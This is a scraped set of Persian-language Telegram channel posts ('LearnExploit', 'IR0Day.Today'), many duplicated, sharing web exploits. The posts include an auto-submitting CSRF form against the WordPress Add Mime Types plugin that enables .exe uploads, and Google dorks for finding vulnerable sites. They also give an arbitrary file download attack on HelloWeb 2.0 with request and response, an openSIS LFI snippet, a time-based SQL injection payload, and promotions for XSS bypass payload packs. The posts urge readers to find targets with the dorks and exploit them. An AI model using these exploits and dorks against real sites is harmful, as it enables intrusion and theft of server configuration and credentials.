#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
#Dork #vulnerabilities #Sqli
➖➖➖➖➖➖➖➖➖➖
باگ SQL در افزونه ی وردپرسی From Maker :
#Dork~:
#Exploit~:
CWE
#Description~:
این باگ در نسخه ی 1.13.36 و نسخه های پایین تر وجود دارد.
➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖
باگ SQL در افزونه ی وردپرسی From Maker :
#Dork~:
inurl:wp-content/plugins/from-maker
#Exploit~:
Sql Query
CWE
#Description~:
این باگ در نسخه ی 1.13.36 و نسخه های پایین تر وجود دارد.
➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
cwe.mitre.org
CWE -
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (4.17)
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (4.17)
Common Weakness Enumeration (CWE) is a list of software weaknesses.
#LFI #vulnerabilities #OpenSIS #Webapp
#Local_File_Inclusion #Versian 7.4 <<
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در سیستم OenSIS ورژن 7.4 و پایینتر
بررسی اسیب پذیری در پست بعدی.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#Local_File_Inclusion #Versian 7.4 <<
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در سیستم OenSIS ورژن 7.4 و پایینتر
بررسی اسیب پذیری در پست بعدی.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#LFI #vulnerabilities #OpenSIS #Webapp #Local_File_Inclusion
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در OpenSIS (ورژن ۷.۴ و پایینتر) :
[-]Title~#:
openSIS <= 7.4 (Bottom.php) Local File Inclusion Vulnerability
➖➖➖➖➖➖➖➖
[-] Software Link:
https://opensis.com/
➖➖➖➖➖➖➖➖
[-] Affected Versions:
باگ در ورژن 7.4 و ورژن های پایینتر موجود است.
➖➖➖➖➖➖➖➖
[-] Vulnerability Description:
باگ در فایل Bottom.php می باشد.
قسمتی اسیب پذیر فایل:
ملاحظه می کنید که در خط ۴۳ مقدار از کاربر گرفته می شود ولی در خط ۴۵ بدون هیچ محدودیتی اجرا میشود.
هنوز هیچ اپدیتی برای این اسیب پذیری نیومده.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖➖➖
اسیب پذیری LFI در OpenSIS (ورژن ۷.۴ و پایینتر) :
[-]Title~#:
openSIS <= 7.4 (Bottom.php) Local File Inclusion Vulnerability
➖➖➖➖➖➖➖➖
[-] Software Link:
https://opensis.com/
➖➖➖➖➖➖➖➖
[-] Affected Versions:
باگ در ورژن 7.4 و ورژن های پایینتر موجود است.
➖➖➖➖➖➖➖➖
[-] Vulnerability Description:
باگ در فایل Bottom.php می باشد.
قسمتی اسیب پذیر فایل:
36. if(clean_param($_REQUEST['modfunc'],PARAM_ALPHA)=='print')
37. {
38. $_REQUEST = $_SESSION['_REQUEST_vars'];
39. $_REQUEST['_openSIS_PDF'] = true;
40. if(strpos($_REQUEST['modname'],'?')!==false)
41. $modname =
substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
42. else
43. $modname = $_REQUEST['modname'];
44. ob_start();
45. include('modules/'.$modname)
;ملاحظه می کنید که در خط ۴۳ مقدار از کاربر گرفته می شود ولی در خط ۴۵ بدون هیچ محدودیتی اجرا میشود.
هنوز هیچ اپدیتی برای این اسیب پذیری نیومده.
➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit
#Dork #vulnerabilities #Webapp #ZenTeo
➖➖➖➖➖➖➖➖➖
دورک ثبت شده ZenTeo توسط IR0Day.Today Boy's :
با این دورک میتونید سایت های اسیب پذیر روی برنامه ی ZenTeo رو پیدا کرده و از اسیب پذیری
Command Injection
استفاده کنید.
اگر وقت شد نحوه ی استفاده از اکسپلویت رو برایتون قرار میدیم.
➖➖➖➖➖➖➖➖➖➖
Dork Link :
https://cxsecurity.com/issue/WLB-2020070018
➖➖➖➖➖➖➖
Author : X0P4SH4
➖➖➖➖➖➖➖
Risk Level : Hight
➖➖➖➖➖➖➖
Exploit lang : .py
➖➖➖➖➖➖➖
TM : t.me/IR0DayToday
➖➖➖➖➖➖➖➖➖➖
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖
دورک ثبت شده ZenTeo توسط IR0Day.Today Boy's :
با این دورک میتونید سایت های اسیب پذیر روی برنامه ی ZenTeo رو پیدا کرده و از اسیب پذیری
Command Injection
استفاده کنید.
اگر وقت شد نحوه ی استفاده از اکسپلویت رو برایتون قرار میدیم.
➖➖➖➖➖➖➖➖➖➖
Dork Link :
https://cxsecurity.com/issue/WLB-2020070018
➖➖➖➖➖➖➖
Author : X0P4SH4
➖➖➖➖➖➖➖
Risk Level : Hight
➖➖➖➖➖➖➖
Exploit lang : .py
➖➖➖➖➖➖➖
TM : t.me/IR0DayToday
➖➖➖➖➖➖➖➖➖➖
@LearnExploit
@Tech_Army
Cxsecurity
ZenTao Pro 8.8.2 - Command Injection Dork - CXSecurity.com
X0P4SH4 has realised a new security note ZenTao Pro 8.8.2 - Command Injection Dork
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
——————
0Day.Today
@LearnExploit
@Tech_Army
#XSS #vulnerable #vulnerabilities #Payloads #Private #Priv8 #Part_1
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
»» دانلود در پست بعدی...
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
(مفدی نگید کار نمیکنه ،این پیلود هارو باید بلد باشید | البته بعضیا اسونه)
»» دانلود در پست بعدی...
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
#XSS #vulnerable #vulnerabilities #Payloads #Private #Priv8 #Part_1
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
نکته : یادم رفت بگم
دوستان علاوه بر اینکه بخش اعظمی از پیلود ها توشه بایپس های زیادی هم به همراه پیلود ها ترکیب شده
»» جهت دانلود کلیککنید.
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖
پیلود های اسیب پذیری XSS
»»
(مفدی نگید کار نمیکنه ،این پیلود هارو باید بلد باشید | البته بعضیا اسونه)
نکته : یادم رفت بگم
دوستان علاوه بر اینکه بخش اعظمی از پیلود ها توشه بایپس های زیادی هم به همراه پیلود ها ترکیب شده
»» جهت دانلود کلیککنید.
#Author : X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit
آسیب پذیری
#vulnerabilities:
in
#POC:
Username = ' or sleep(5)='-- -
Password = ' '
#V:
1.0
#VulnerablePage: http://localhost/PhoneBook/index.php
Sql injection
در پلاگین PhoneBook از WpCms :#vulnerabilities:
in
index.php
line 13 :$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
#POC:
Username = ' or sleep(5)='-- -
Password = ' '
#V:
1.0
#VulnerablePage: http://localhost/PhoneBook/index.php
Telegram
AttachLearnExploit
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army